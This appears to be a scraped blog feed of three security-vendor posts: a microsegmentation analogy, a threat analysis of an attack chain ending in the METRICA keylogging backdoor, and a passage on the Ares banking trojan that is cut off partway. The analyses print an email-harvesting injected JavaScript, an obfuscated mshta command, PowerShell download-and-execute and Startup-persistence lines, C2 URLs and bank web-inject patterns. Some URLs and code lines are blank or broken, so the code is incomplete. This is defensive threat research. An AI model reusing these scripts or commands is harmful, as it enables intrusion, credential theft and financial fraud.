Buffalo. At first blush, this seems fairly straightforward: hop on I-90W and drive for seven or eight hours. Depending on where in the Boston area you’re starting from and where in the Buffalo area you need to go, it might take you more or less time. A few variables, but this plan is simple and focused. But how does the route change if you’re the kind of person who hates driving on highways? What happens to your plan if a portion of the interstate is under construction or a major crash backs up traffic for hours? What if you want to stop along the way to have a nice meal instead of zipping in and out of a rest stop along the side of the highway? Upon further thought, A straight line from east to west may not be the best option. It is most certainly not the only option, in any case. And if you input your travel requirements and preferences into three different GPS services, you may very well end up with multiple but divergent routes. There isn’t any “one” way to get from Boston to Buffalo; the “best” travel route depends on various factors. The same is true for network traffic between hosts, applications, servers, etc. Any given network may have dozens or even hundreds of network paths on which communication can travel. Many of those network traffic routes are unnecessary for normal business operations, but they exist (just like some dirt roads between Boston and Buffalo surely exist). If you’re an infrastructure/operations or security professional and you consider how to protect every single traffic route between apps/hosts/services on your networks, it quickly becomes overwhelming—just like if you were to thoughtfully evaluate every highway/street/backroad between Boston and Buffalo. At some point, before your car trip begins, you have to decide which route you’ll take. Identifying the “best” route means incorporating your endgame (“driving from Boston to Buffalo”) while avoiding the interstate around Albany during rush hour and allowing you to stop at Dinosaur Bar-B-Que in Syracuse before finishing your trip. By defining your goals for the trip, you can then reduce the number of viable routes and focus your planning on only the routes that fit your requirements while taking into account time-to-destination and avoidance of construction. In a network, you can’t limit the available paths to one (that would destroy processing), but you can limit the number of traffic routes networked resources can use by blocking unnecessary network paths and creating secure zones (i.e., microsegments or “collections”) inside which only verified applications and services can communicate. This, in turn, reduces the network attack surface, which results in a focused strategy for protecting the organization’s “crown jewels,” a.k.a., its data-rich applications. The “how” is using microsegmentation to shrink the attack surface and the “why” is to achieve a targeted security strategy that protects your communicating assets. Is microsegmentation “the best” strategy? If you’re in a situation where you’re trying to figure out if microsegmentation is the “best” strategy to protect your networks, pondering your options at a high level may lead you to conclude that microsegmentation is too complex (“there are too many traffic routes attackers can use to access my crown jewels!”), too costly (“I have to secure all the routes!”), and not scalable (“there are too many networked resources to protect across disparate environments!”). But if you stop for a moment and consider your use cases—decreased operational complexity and/or ubiquitous application-centric control across networking environments—it’s easy to think of other things (like driving to Buffalo for chicken wings) that simplify the decision process and make a thorny subject seem easier to navigate. When trying to garner budget or support from a business-focused exec for a microsegmentation project, use an analogy to explain your request. You just might find it’s the best tactic for explaining “why.” Additional resources: How Microsegmentation Differs from Network Segmentation Zero Trust Microsegmentation for Hybrid Cloud Three Paths for Reducing the Network Attack Surface Tue, 16 Mar 2021 10:47:54 -0700 Dan Perkins Low-volume multi-stage attack leveraging AzureEdge and Shopify CDNs Introduction In Feb 2021, Threatlabz observed a few instances of a low-volume multi-stage web attack in Zscaler cloud. This web attack leveraged legitimate servers of Microsoft (, Dropbox and content delivery network of Shopify ( to host the malicious files. The attack chain started from a Wordpress site with a compromised plugin. When the victim browsed to the compromised e-commerce Wordpress site, the injected JavaScript in the WooCommerce plugin kick-started the infection chain. The infection chain on the endpoint device consists of multiple stages involving the usage of MSHTA, PowerShell, C# backdoor which is also executed inline by PowerShell code. Based on our research, this threat actor is not yet documented anywhere and we have not attributed this to any known threat actor yet. We have given the name - METRICA to the new C# backdoor discovered in this research. In this blog, we describe technical details of the entire infection chain end-to-end. Attack flow Figure 1 shows the end-to-end attack flow which leads to the download of the final backdoor, METRICA. Figure 1: Attack flow As shown in the above attack flow, in one of the observed instances of attacks, the user searched for the string “steelcase adjustable arm” on the Google search engine. From the search results, user navigated to the URL: officechairatwork[.]com/product/steelcase-think-chair-3d-knit-back-4-way-adjustable-arms Figure 2 shows officechairatwork[.]com, a legitimate Wordpress-based e-commerce website. Figure 2: e-Commerce Wordpress site. It uses the WooCommerce order tracking Wordpress plugin. One of the JavaScripts for this plugin was injected with malicious code. Interestingly, the injected code uses base64 encoding to prevent any suspicion. URL of injected JavaScript: hxxp://officechairatwork[.]com/wp-content/plugins/yith-woocommerce-order-tracking/assets/js/ywot.js?ver=5.6 Figure 3 shows the injected code. Figure 3: JavaScript code injected in the WooCommerce Wordpress plugin This injected code dynamically creates a script element using HTML DOM which adds an external JavaScript reference. "script.src = 'https://metrica2.azureedge[.]net/tracking'" This results in the website loading the malicious code from above URL. It ultimately redirects the user to the legitimate file-hosting site, Dropbox to download a ZIP archive which contains the malicious LNK file. URL: www.dropbox[.]com/s/3mrfasci8ibhms9/ Technical analysis First we will look at the malicious JavaScript code which was injected in the compromised Wordpress plugin on the website and how it leverages multiple stages to redirect the user to the final download page. Injected JavaScript analysis Note: Please refer the Appendix section at the end of the blog for the complete JavaScript code snippets. Stage-1 JavaScript URL: metrica2.azureedge[.]net/tracking The first stage JavaScript performs a few checks to determine the next stage JavaScript to be loaded. It contains references to four more JavaScripts which are explained in detail in this section. Stage 1 JavaScript code defines 3 functions: 1. load_path: Creates a dynamic script element in the DOM 2. getMails: Performs regex to check if the given string input is in the standard email ID format. 3. valid: It scans the page ‘input’ elements to retrieve the logged in user email ID. Execution of the JavaScript code starts by retrieving two items from the browser’s sessionStorage with names - ‘startDate’ and ‘startMail’. It uses the above fetched values to perform following actions: 1. Checks if startDate is valid and if yes, then calculates the difference between current time and saved time(startDate). If the difference is less than 100 seconds then it calls the load_path function which in turn loads the next stage JavaScript from the path “” 2. If startDate is not valid then the function named valid is called in 500 milliseconds intervals to retrieve the logged in user email ID. When the email ID is retrieved successfully, it calls the load_path function which in turn loads the next stage JavaScript from the path “” Stage-2 JavaScript URL 1: metrica2.azureedge[.]net/lockpage The second stage JavaScript performs two operations: 1. Prepends a ‘div’ element with id ”slashpage” to the website’s main page and inserts an empty ‘iframe’ element with name “splashpage-iframe” to it. 2. Creates a dynamic script element in the DOM which loads the next stage JavaScript from the path “” URL 2: metrica2.azureedge[.]net/slashpage Performs the same operations as /lockpage. In addition to that, it retrieves the startDate item from sessionStorage and if not found, sets it to the current date. Stage-3 JavaScript URL: metrica2.azureedge[.]net/PatternSite The third stage JavaScript has configurable parameters that control the execution behaviour as well as frequency of execution of the contained JavaScript code. This stage of JavaScript is responsible for displaying or hiding a banner as a social engineering technique to lure the victim to download a malicious ZIP file. The banner is displayed by configuring the ‘div’ and ‘iframe’ elements created by the second stage JavaScript. The source URL for the banner is “” Figure 4 shows the banner displayed to the user. Figure 4: Banner displayed to the user When the user clicks the Continue button, it initiates the ZIP file download request in the background. As soon as the download request is sent, the banner content is also changed as shown in Figure 5. Figure 5: Changed banner content pointing to open the downloaded file The downloaded ZIP file contains a LNK file inside which is executed by the user. For the purpose of technical analysis, we will look at the LNK file with MD5 hash: 2d0f946bac9b565b15cb739473bd4b20 This LNK was archived inside a ZIP file which was hosted on the Dropbox URL: www.dropbox[.]com/s/3mrfasci8ibhms9/ The LNK file on execution used the following command line to fetch malicious VBScript code from attacker configured server on Command line: %WINDIR%\System32\cmd.exe /c "set a=start ms&&set b=hta ht&&set c=tps://&&set d=web-google.azur&&set set f=%a%%b%%c%%d%%v%&&call %f%"&&exit The above command line will leverage MSHTA to download the malicious VBScript from the URL: web-google.azureedge[.]net/doc-YUSKQOPZUFD The downloaded VBScript in turn will connect to the URL: string.azureedge[.]net/doc49672.jpeg/ps1/9876/ to download the next stage PowerShell code. The downloaded PowerShell code has C# code embedded inside it, which will be executed inline by the PowerShell code. This C# code is a backdoor which we have named as “METRICA” METRICA backdoor analysis The METRICA backdoor is executed inline using wrapped PowerShell code to make the backdoor execution fileless. Note: PowerShell natively supports inline C# execution. Using the following snippet of code, it is possible to perform inline code execution of C#. Add-Type -ReferencedAssemblies {Add any assembly references here} -TypeDefinition {Add C# code here} -Language CSharp; Figure 6 below shows the PowerShell code calling the C# code Figure 6: PowerShell code calling C# code In order to avoid static detection and hinder the analysis, the METRICA backdoor is generated on the fly using a server-side generator (in the case of hosting service - Due to this, each request to download the backdoor results in a backdoor with different size and different static string obfuscation. In case the backdoor is hosted on, it is not generated on-the-fly but seems to be regularly updated by the attacker. NOTE: This is likely because the hostings are directly owned by the attacker. Code analysis The METRICA backdoor execution starts by calling its main function from the wrapper PowerShell code.The main function takes the below 3 input parameters. ● A domain name ● Key which is used for encryption/decryption of data ● Default value to use for delay between the network requests In the analysed sample following values were passed which can also be seen in Figure 6 above: ● Domain Name: "https://global.asazure[.]" ● Key: "ENoztOORXAkUuWOkSdzLaRRL" ● Default Delay Value: "9567" Note: Based on further analysis, we found that the ‘Key’ is configured per C2 server and is never sent as part of network communication. Execution of the main function performs the below operations. 1. Registers the infected machine to the C2 server. This is the bot registration stage. 2. Creates a thread to perform keylogging and capture foreground/active window text. 3. Starts the C2 communication and executes the command received by calling the required function. Figure 7 highlights the different operations performed by the main function Figure 7: Different operations performed by main function BOT registration BOT registration request is sent to the C2 server with the below information from the infected system. ● Generated BOT ID ● Computer Name ● User Domain ● UserName The information collected is formatted as shown below. register {BOT ID} {ComputerName}{DomainName}\\{UserName} For more details about the network traffic, please refer to the network communication section of the analysis. Information collection and exfiltration METRICA backdoor collects the following information from infected system ● Keystrokes ● Foreground/Active window text To exfiltrate the logged information a Timer object is created which calls the log exfiltration function every 5 seconds. This is done to maintain the fileless execution since the keystrokes and window text information is stored in the memory and cleared as the information is exfiltrated. The logged information is formatted as shown below. userinput {Base64_encoded_logged_information} Figure 8 highlights information logging and exfiltration operations Figure 8: Information logging and exfiltration operations More details about the network traffic are added in the Network Communication section of the analysis. Network communication Initialization METRICA backdoor performs all the network communication over HTTPs. All web requests are created using the domain name which is passed as the first parameter to the main function described earlier and a network path which is generated as a random string for every request. Afterwards following header fields are initialized: ● Method: “POST” ● UserAgent: Initialized with OS Version string ● Timeout: 10000 ● Host: Attacked controlled endpoint on the CDN ● ProxyCredentials: Default Credentials Request/Response Format All the network requests/responses use the following format: { UUID: “Unique identifier for every exfiltration request/response pair”, ID: “BOT ID of the infected machine”, DATA: “Encrypted and Base64 encoded data” } BOT registration request Like every other backdoor the first network request is of BOT registration. Data sent as part of the request is already described in the BOT registration section. No UUID is used in the registration request. C2 Commands The network request to fetch the C2 command is sent at regular intervals. The UUID and the DATA field are empty for all such network requests. Based on the C2 response from the server different operations are performed. The METRICA backdoor checks if the UUID field in the response is set or not. If the UUID field is set, it decrypts the response data specified in the DATA field.The decrypted data then specifies the command to be executed. The table below describes the backdoor supported commands and corresponding action performed. Command Action Performed delay Updates the time delay between the network requests screenshot Capture screenshot of all the connected screens and send to the C2 server exit Stop fetching new commands from the C2 server Raw PowerShell command Execute the raw PowerShell command and send the output to the C2 server 1. delay Updates the time delay between the network requests with the C2 server specified value. No network response is sent back. 2. screenshot For all the available screens capture screenshot and send to the C2 server one at a time. To maintain the fileless execution the screenshot is saved in memory and sent to the C2 server. 3. exit Sets a boolean variable which breaks the C2 communication loop. No network response is sent back. 4. Raw PowerShell command Executes the raw PowerShell command and sends the result back to the C2 server. To execute the PowerShell command from C# code a Runspace is created. A Pipeline is opened to the created Runspace. The pipeline is then used to specify the PowerShell command to be executed and also configure the Runspace to send the output back to the C# code. The output is then sent to the C2 server. Note: To read more about Runspace check this article. Persistence Achieves persistence by leveraging PowerShell code to download a new LNK file from Dropbox and dropping it in the Startup directory. The PowerShell code is broken into two stages: ● First stage PowerShell code is sent as a C2 command which downloads and executes the second stage PowerShell code from the specified remote location. ● The second stage PowerShell code downloads the new LNK and drops it in the Startup directory. First stage PowerShell code sent as C2 command: IEX (New-Object Net.Webclient).downloadstring('') Second stage PowerShell code for downloading new LNK and dropping it in the Startup directory: $client = new-object System.Net.WebClient;$client.DownloadFile("","$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Startup.lnk"); Note: The reason for achieving persistence only by specifying the C2 command could be to avoid persistent infection in case the victim profile is not of any interest to the attacker. Further the entire attack chain is fileless except the initial ZIP download so it also helps lower the fingerprints in the infected system. Zscaler Sandbox report Figure 9 shows the Zscaler Cloud Sandbox successfully detonating and detecting this threat. Figure 9: Zscaler Sandbox report In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators at various levels. PS.Backdoor.Metrica Win32.Downloader.Metrica LNK.Downloader.Metrica MITRE ATT&CK TTP Mapping ID Tactic Technique T1566.001 Drive-by Compromise Compromised plugin JavaScript file T1204.002 User Execution: Malicious File User opens the downloaded ZIP file and executes the contained LNK T1059 Command and Scripting Interpreter Executes malicious JavaScript and PowerShell code T1547.001 Registry Run Keys / Startup Folder Creates LNK file in the startup folder for persistence T1140 Deobfuscate/Decode Files or Information Strings and other data are obfuscated in the payloads T1218 Signed Binary Proxy Execution Uses mshta to execute the VBScript code T1027.002 Obfuscated Files or Information: Software Packing Payloads are packed in layers T1082 System Information Discovery Gathers system OS version info T1033 System Owner/User Discovery Gathers currently logged in Username T1113 Screen Capture Capture Screenshot of all the connected screens T1056 Input Capture Capture keystrokes and foreground window text T1132.001 Data Encoding: Standard Encoding Uses Base64 encoding for data exfiltration T1071.001 Application Layer Protocol: Web Protocols Uses https for C2 communication T1041 Exfiltration Over C2 Channel Data is exfiltrated using existing C2 channel Indicators of compromise Hashes // ZIP 53558b99cbfe6f99dd1597e21b49b07e d6fb36a86aec32f17220050da903a0ce //LNK 2d0f946bac9b565b15cb739473bd4b20 272edc017f01eef748429358b229519b ZIP File download links www.dropbox[.]com/s/3mrfasci8ibhms9/ www.dropbox[.]com/s/g2hw0s5qec1kvzs/ Intermediate stage payload hosting // MD5: 2d0f946bac9b565b15cb739473bd4b20 hxxps://web-google.azureedge[.]net/doc-YUSKQOPZUFD hxxps:// hxxps://string.azureedge[.]net/doc49672.jpeg/ps1/9876/ // MD5: 272edc017f01eef748429358b229519b hxxps:// hxxps:// hxxps:// // Persistence LNK hxxps:// hxxps://theme.azureedge[.]net/microsoft.jpeg/ps1/9567/ C2 domains // POST method used for communication JavaScript files metrica2[.]azureedge[.]net/tracking metrica2[.]azureedge[.]net/PatternSite metrica2[.]azureedge[.]net/PatternSiteLock metrica2[.]azureedge[.]net/lockpage metrica2[.]azureedge[.]net/slashpage Banner hosting metrica2[.]azureedge[.]net/templates/template_2/modal_test2_animate_responsive_json.html Dropped Filenames and full paths Terms And Terms And Conditions.lnk {APPDATA}\Microsoft\Windows\Start Menu\Programs\Startup\Startup.lnk OSINT submissions Hashes //ZIP b0cf113c0eddd55aa536c75e6ac4d670 8593e4d458ef4fc6ca35b1138c9e37a4 //LNK 2e68d6a2b29a12de919bfd936ee62d7b 422a4fc87fece907f93daa4d3e23f907 Intermediate stage payload hosting hxxps://doc-web1.azureedge[.]net/doc-YUSKQOPZUFD hxxps://compos20.azureedge[.]net/doc-YUSKQOPZUFD Appendix //Stage-1 JavaScript startDate = sessionStorage.getItem('startDate'); startMail = sessionStorage.getItem('startMail'); var metrica_path = ''; var metrica_path_lock = ''; var metrica_lock = ''; var metrica_slashpage = ''; function load_path(metrica, email){ var metricasrc = document.createElement('script'); metricasrc.src = ('https:' == document.location.protocol ? 'https://' : 'http://') + metrica + '?q=' + encodeURIComponent(email); document.getElementsByTagName("html")[0].appendChild(metricasrc); } function getEmails(search_in) { array_mails = search_in.toString().match(/([a-zA-Z0-9._-]+@[a-zA-Z0-9._-]+\.[a-zA-Z0-9._-]+)/gi); if(array_mails !== null){ return array_mails[0]; } else{ return ''; } } if (startDate) { startDate = new Date(startDate); } if (startDate != null && Math.trunc((new Date() - startDate)/1000) < 100) { email = startMail; load_path(metrica_lock, email); } if (startDate == null){ var is_email = 0; var forminput = document.querySelectorAll('input'); function valid(){ for(var i = 0; i < forminput.length; i++) { if (forminput[i].type=='email' || forminput[i].type=='text'){ if (forminput[i] != document.activeElement) { var email = getEmails(forminput[i].value); if(email != ''){ startMail = sessionStorage.getItem('startMail'); if (startMail) { startMail = email; } else { startMail = email; sessionStorage.setItem('startMail', startMail); } load_path(metrica_slashpage, email); clearInterval(myVar); return; } } } } } var myVar = setInterval(valid, 500); } //Stage-2 JavaScript startDate = sessionStorage.getItem('startDate'); if (startDate) { startDate = new Date(startDate); } else { startDate = new Date(); sessionStorage.setItem('startDate', startDate); } var formdiv = document.querySelector('body'); var pagediv = document.createElement('div'); = 'slashpage'; = 'position:absolute;z-index:100000;'; pagediv.innerHTML = '<iframe name="splashpage-iframe" src="about:blank" style="margin:0;border:0;padding:0;width:100%;height:100%" ></iframe><br /> ' formdiv.insertBefore(pagediv, formdiv.firstChild); var metricasslash = document.createElement('script'); metricasslash.src = ('https:' == document.location.protocol ? 'https://' : 'http://') + metrica_path + '?q=' + encodeURIComponent(startMail); document.getElementsByTagName("html")[0].appendChild(metricasslash); //Stage-3 JavaScript var splashpage = { splashenabled: 1, splashpageurl: "//", enablefrequency: 0, displayfrequency: "2 days", cookiename: ["splashpagecookie", "path=/"], autohidetimer: 0, launch: false, browserdetectstr:(window.opera && window.getSelection) || (!window.opera && window.XMLHttpRequest), output: function(){ this.splashpageref = document.getElementById("slashpage"); this.splashiframeref = window.frames["splashpage-iframe"]; this.splashiframeref.location.replace(this.splashpageurl); this.standardbody = (document.compatMode == "CSS1Compat") ? document.documentElement : document.body; if(!/safari/i.test(navigator.userAgent)) = "hidden"; = 0; = 0; = "100%"; = "100%"; this.moveuptimer = setInterval("window.scrollTo(0,0)", 50); }, closeit: function(){ clearInterval(this.moveuptimer); = "none"; this.splashiframeref.location.replace("about:blank"); = "auto"; }, init: function(){ if(this.enablefrequency == 1){ if(/sessiononly/i.test(this.displayfrequency)){ if(this.getCookie(this.cookiename[0] + "_s") == null){ this.setCookie(this.cookiename[0] + "_s", "loaded"); this.launch = true; } } else if(/day/i.test(this.displayfrequency)){ if(this.getCookie(this.cookiename[0]) == null || parseInt(this.getCookie(this.cookiename[0])) != parseInt(this.displayfrequency)){ this.setCookie(this.cookiename[0], parseInt(this.displayfrequency), parseInt(this.displayfrequency)); this.launch = true; } } } else this.launch = true; if(this.launch){ this.output(); if(parseInt(this.autohidetimer) > 0) setTimeout("splashpage.closeit()", parseInt(this.autohidetimer) * 1000); } }, getCookie: function(Name){ var re = new RegExp(Name + "=[^;]+", "i"); if(document.cookie.match(re)) return document.cookie.match(re)[0].split("=")[1]; return null; }, setCookie: function(name, value, days){ var expireDate = new Date(); if(typeof days != "undefined"){ var expstring = expireDate.setDate(expireDate.getDate() + parseInt(days)); document.cookie = name + "=" + value + "; expires=" + expireDate.toGMTString() + "; " + splashpage.cookiename[1]; } else document.cookie = name + "=" + value + "; " + splashpage.cookiename[1]; } }; if(splashpage.browserdetectstr && splashpage.splashenabled == 1) splashpage.init(); Tue, 23 Mar 2021 09:00:12 -0700 Sudeep Singh Ares Malware: The Grandson of the Kronos Banking Trojan Kronos is a banking trojan that first emerged in 2014 and marketed in underground forums as a crimeware kit to conduct credit card, identity theft, and wire fraud. In September 2018, a new Kronos variant named Osiris introduced several new features including TOR for command and control (C2) communications. The last update to Osiris appears to have been around mid-2019. In February 2021, Zscaler ThreatLabz identified a new Kronos variant that surfaced via spam campaigns to German speakers, which calls itself Ares. In Greek mythology, Ares is the son of Zeus and grandson of Kronos. Thus, the naming convention appears to refer to this new malware variant as the third generation of Kronos. Ares still appears to be in development alongside an information stealer that harvests credentials from various applications including VPN clients, web browsers, and the malware can exfiltrate arbitrary files and cryptocurrency wallets. The threat actor behind this new variant continues to use both Osiris and Ares in parallel. In this blog post, we will examine these new malware developments and campaigns. DarkCrypter Recent samples of Osiris and Ares have been protected by a malware packer written in C++ that calls itself DarkCrypter. The packer contains the PDB path d:\scm\Italy\dopplegang\DarkCrypter\Bin\Clean.pdb. The code is not related to the commercial packer, DarkCrypter, that has been cracked and leaked online. Interestingly, the packer shares code with Kronos and Osiris including the string encryption algorithm. When the string table is decrypted, the first 41 entries are identical to older Kronos variants with eight new string additions (shown below) to detect sandbox environments: atcuf32.dll umengx86.dll sandboxie.dll libctc_sandbox.dll atcuf64.dll antimalware_provider32.dll antimalware_provider64.dll libctc_onexecute.dll If the anti-analysis checks pass, the packer proceeds to the next step. There are at least two variants of the packer. The first variant decrypts the next-stage payload using Blowfish. However, the decryption process uses a non-standard Blowfish key size. Typically, Blowfish key sizes are between 4 bytes and 56 bytes. However, the Blowfish decryption implementation in DarkCrypter supports a hardcoded key size that is 288 bytes (although only the first 72 bytes are effectively used). This may be designed to break cryptographic libraries that implement Blowfish and follow the standard, where the maximum key size is limited to 56 bytes. The Blowfish key is located by computing a djb2 hash of each section name in the PE header. The code compares the resulting hash value with two hardcoded values that map to the section names .text (0xb80c0d8) and .sjdata (0xecae6faa). The second variant of the DarkCrypter packer embeds the second-stage payload in a compressed format rather than an encrypted Blowfish format. The compression algorithm is identical to that found in Ares, and components related to Ares, including a packer that impersonates a bitmap image header. Modified UPX Packer The threat actor has also experimented with modifying UPX headers, which has well known section names. The modifications that have been made by the threat actor replace the UPX section names (UPX0, UPX1, ...) with standard section names like .text, .data, and .rdata. This breaks compatibility with the command-line UPX decompression tool, although the file can still be decompressed and executed. An example of the file header modifications are shown below in Figure 1 on the left, with the alterations highlighted in red. Figure 1. Modified and Restored UPX Headers These changes can easily be restored to the original UPX section names as shown on the right in Figure 1. The UPX command-line utility can then be used to statically unpack this binary, producing the final executable payload. BMPack The threat actor has also been using another packer that Zscaler ThreatLabZ has dubbed BMPack. This packer has been utilized to pack both Osiris and Ares payloads. BMPack first decrypts embedded data using an XOR-based algorithm, followed by RC4. After the decryption stage, the file appears to be a bitmap image as shown in Figure 2. Figure 2. Fake Bitmap Image Used to Unpack Osiris and Ares Malware Payloads However, a closer inspection reveals that the data is not actually a bitmap image, but has a specific sequence of data structures. By reverse engineering the packer, the format of the data structures can be determined, which consist of three DWORD values that represent the compressed size (red), uncompressed size (green), next offset (blue), followed by the compressed data (orange). An example of the first data structure is shown below in Figure 3. Figure 3. Format of BMPack Data Structures Each decompressed structure holds a different section of a PE file that is reconstructed and stitched together by a custom loader, and executed. Ares Malware Ares is being actively developed and the malware author continues to create and test new plugins and web injects. In the most recent Ares samples, there is an embedded DLL module that is compressed within the binary. The module contains an export that is designed to establish persistence. The code first copies itself to the location %APPDATA%\Adobe\AdobeNotificationUpdates.exe. It then creates a scheduled task named AdobeNotificationUpdates that is designed to execute Ares every two hours (with an expiration date of 2050-05-02 12:05:00). Similar persistence code is also found in many DarkCrypter samples. The Ares persistence module has the same compilation prefix as other modules in its PDB path D:\scm\Italy\ares\source_ob\Release\startup.pdb. Ares attempts to locate an export name with the hash value F4S4G3S4U7C6P2P7, which maps to the string ?Startup@@YAHPA_W@Z. Once the address of this function is located, Ares executes the module. Ares uses the same function hashing algorithm as Kronos, which consists of calculating a CRC64 hash, converting the digest to uppercase hexadecimal characters. The result is then mapped to an alphanumeric value as shown in the Python code below: digest = hexdigest(crc64(function_name)).upper() out = "" for i in range(len(digest)): if i & 1 != 0: val = ord(digest[i]) % 9 + ord('0') else: val = ord(digest[i]) % 25 + ord('A') out += chr(val) return out Ares contains most of the same code as its predecessors: Kronos and Osiris. However, there are several notable differences between Osiris and Ares, especially with respect to the C2 communications. Most Ares samples currently do not communicate with C2 servers over TOR. It is not quite clear, why most Ares samples have the TOR component removed, but it may be to reduce the malware's file size and evade corporate firewalls that block TOR network traffic. However, without TOR, the C2 servers are more vulnerable to takedown attempts. Some Ares samples attempt to address this limitation by hardcoding a large number of C2 URLs in the binary. Zscaler ThreatLabz has observed one Ares sample with 101 hardcoded C2 URLs. Ares has also slightly modified the bot ID generation code, replacing the string Kronos with the string Ares as shown in Figure 4. Figure 4. Comparison Between Kronos and Ares Bot ID Generation Ares uses the HTTP query string parameters shown in Table 1. The HTTP request that sends the file is unique to Ares and discussed in more detail below. Query String Description a=0 Send log data a=1 Download web injects a=2 Send keylogger data a=3 Send file created by Ares Stealer a=4 Request new commands Table 1. Ares Query String Parameters Ares Commands Ares supports many of the same commands as Kronos and Osiris. However, some of the commands have been modified and the malware uninstall command (0x1) was removed. There are four modified commands that are supported by Ares as shown below in Table 2. Command Number Description 0x3 Set registry value name MSE to 0 0x4 Set registry value name MSE to 1 0x6 Download, decompress, map Ares Stealer into memory, and execute 0xC Download, decompress, map module into memory, and execute Table 2. New Commands Introduced By Ares The commands 0x3 and 0x4 attempt to set a registry value name MSE to zero and one, respectively, under the registry key HKEY_CURRENT_USER\Software\Microsoft\CurrentVersion. However, this registry key does not exist and both functions will fail. This is likely an oversight by the malware author who accidentally left out Windows in this registry path between Microsoft and CurrentVersion. The registry value is not referenced elsewhere in Ares, so it may hint at a future use. One of the most significant modifications is the command 0x6 that downloads, decompresses, and maps a PE file into memory, and executes it. Command 0x6 specifically searches for an export name with the hash value C3E0Q6R7F1H2G5A4, which maps to the string CollectInfo. The code passes two string parameters to the CollectInfo export. The first string is a pattern provided by the C2 server and the second is hardcoded to the string %APPDATA%\Google\ Zscaler ThreatLabZ has observed this Ares command being used to download a file from the URL http://mydynamite.dynv6[.]net/panel/upload/stealer.dll. The first four bytes of the response are the uncompressed file size. The file is decompressed using the same compression algorithm as BMPack. Ares has code artifacts from the development of command 0x6. Samples contain an unreferenced function that attempts to open a file located at d:\scm\Italy\ares\source_ob\Binaries\Release\KittyDll.dll.cmp. The file is decompressed and mapped into memory using the same process as command 0x6. After the file is mapped, the export CollectInfo is called with the parameters: %userprofile%Documents|*.txt|5 and NULL. The purpose of these fields will be described in the next section. Note that there is a missing backslash character between %userprofile% and Documents. This string serves as a directory path, and without the backslash the path is invalid. Zscaler ThreatLabZ has also identified Ares samples that contain another unreferenced function that loads a VNC plugin by attempting to open a file located at d:\scm\Italy\ares\\source_ob\Binaries\Release\vnc.dll.cmp. Similar to the stealer plugin, the file is decompressed, mapped into memory, and the export MakeItStart is called. The MakeItStart export name is resolved similar to the other Ares functions using the same CRC64-based hash algorithm and comparing the result with F0U5R4R6Q8H1P3E5. Ares then will terminate the VNC plugin by mapping the export name MakeItStop using the same process and comparing the result with the hash value C6P3T6Q8H1P3E5A8. The command 0xC is the most recent modification to Ares and only found in newer samples. Ares Stealer Ares Stealer is downloaded by Ares and invoked via the export name CollectInfo. The malware is written in C++ and uses the Boost and Curl libraries. Ares Stealer has compilation artifacts showing that the Boost library was compiled in the directory d:\scm\Italy\tools\boost_1_74_0\boost. This directory prefix is identical to the DarkCrypter’s PDB path and the location where the Ares unreferenced test functions attempt to load plugins from. This artifact along with the shared compression code suggests that the malware author likely has developed DarkCrypter, BMPack, Ares, and Ares Stealer. The Ares Stealer export CollectInfo takes two parameters: a pipe-delimited string and a filename string. The pipe-delimited string takes three arguments, which are used by the stealer’s file grabber feature. The first parameter is the directory in which to start the file enumeration process, the second parameter is a search pattern, and the last parameter is the directory search depth. The filename string is used to store the results of the extraction, which are added to a zip file. An example command string observed from an Ares C2 server is %userprofile%|pass*.txt|5. This command will search a victim’s user profile directory up to five levels deep for text files that have the prefix pass. Ares Stealer collects detailed system information and harvests credentials for numerous applications including FTP clients, VPN clients, web browsers, instant messengers, and email clients. It can also steal files, cryptocurrency wallets, cookies, and credit cards. The stealer will attempt to extract information from the following applications: FTP clients Filezilla VPN clients NordVPN OpenVPN ProtonVPN Web browsers Mozilla Firefox Google Chrome Microsoft Edge Microsoft Internet Explorer Chromium Cyberfox BlackHawk Comodo IceDragon CometBird SeaMonkey Pale Moon Waterfox Atom Chromodo Uran CocCoc Nichrome Sputnik K-Meleon Maxthon 3 360 Browser Amigo Comodo Dragon Orbitum QIP Surf Liebao Coowon Catalina Group Citrio Fenrir Sleipnir Elements Kometa Chedot CentBrowser 7 Star Iridium MapleStudio ChromePlus Torch Yandex Browser Epic Privacy Browser Opera Brave Browser Vivaldi Blisk Cryptocurrency wallet applications Coinomi Guarda Atomic Wallet Electrum Ethereum Exodus Bytecoin Armory Zcash Bitcoin Litecoin Instant messenger clients Pidgin Email clients Outlook Osiris The Osiris version that has been used by this threat actor contains a number of new features since the original version that appeared in April 2018. These updates were introduced around mid-2019 and include the following changes: New beacon request format that includes information about the compromised system Zlib compression to reduce the size of requests and responses (including web injects) Ability to deploy TeamViewer on a compromised host Ability to steal a victim’s Outlook contacts via Nirsoft’s OutlookAddressBookView utility Send spam emails to a victim’s contact list New remote access capabilities The threat actor has an Osiris C2 server that is located at http://ylnfkeznzg7o4xjf[.]onion/kpanel/connect.php, which has been instructing infected systems to steal and exfiltrate web browser and email credentials. The web browser harvesting command downloads a sqlite3 library from http://qqkzfkax24p4elax[.]onion/kpanel/upload/sqlite3.dll, which is a dependency to extract Google Chrome passwords. A second module for harvesting Firefox credentials from a 64-bit system is downloaded from http://qqkzfkax24p4elax[.]onion/kpanel/upload/ffc64.exe. The C2 is also serving a web inject configuration file, which targets clients at German financial institutions with the URL patterns shown below: set_url https://** GPI set_url https://*.de/*/entry* GPI set_url https://*.de/banking-*/portal?* GPI set_url https://*.de/banking-*/portal;* GPI set_url https://*.de/portal/portal* GPI set_url https://*.de/privatkunden/* GPI set_url https://*.de*abmelden* GPI set_url https://*.de/de/home* GPI set_url https://*.de/en/home* GPI set_url https://*.de/fi/home* GPI set_url https://** GPI set_url https://*banking.sparda-* GPI set_url https://* GPI set_url https://** GPI set_url https://** GPI set_url https://** GPI set_url https://** GPI When a victim browses to a website that matches one of these patterns, JavaScript code will be injected from the threat actor’s domain https://securebankingapp[.]com/. The full list of web injects for this Osiris instance is shown here. The threat actor has another active Osiris C2 server located at http://qqkzfkax24p4elax[.]onion/kpanel/connect.php. This C2 server is also serving commands to exfiltrate credentials, but the web inject configuration file is blank. However, the C2 server is also providing commands to extract a victim’s email contact list using Nirsoft’s OutlookAddressBookView, which is downloaded from the following locations: http://qqkzfkax24p4elax[.]onion/kpanel/upload/oabv32.exe (32-bit) http://qqkzfkax24p4elax[.]onion/kpanel/upload/oabv64.exe (64-bit) Conclusion Ares is a new fork of the Kronos banking trojan that appears to be in the early stages of development. The code contains several bugs and unreferenced code segments that are likely used for debugging purposes. The threat actor has invested significant resources in building DarkCrypter, 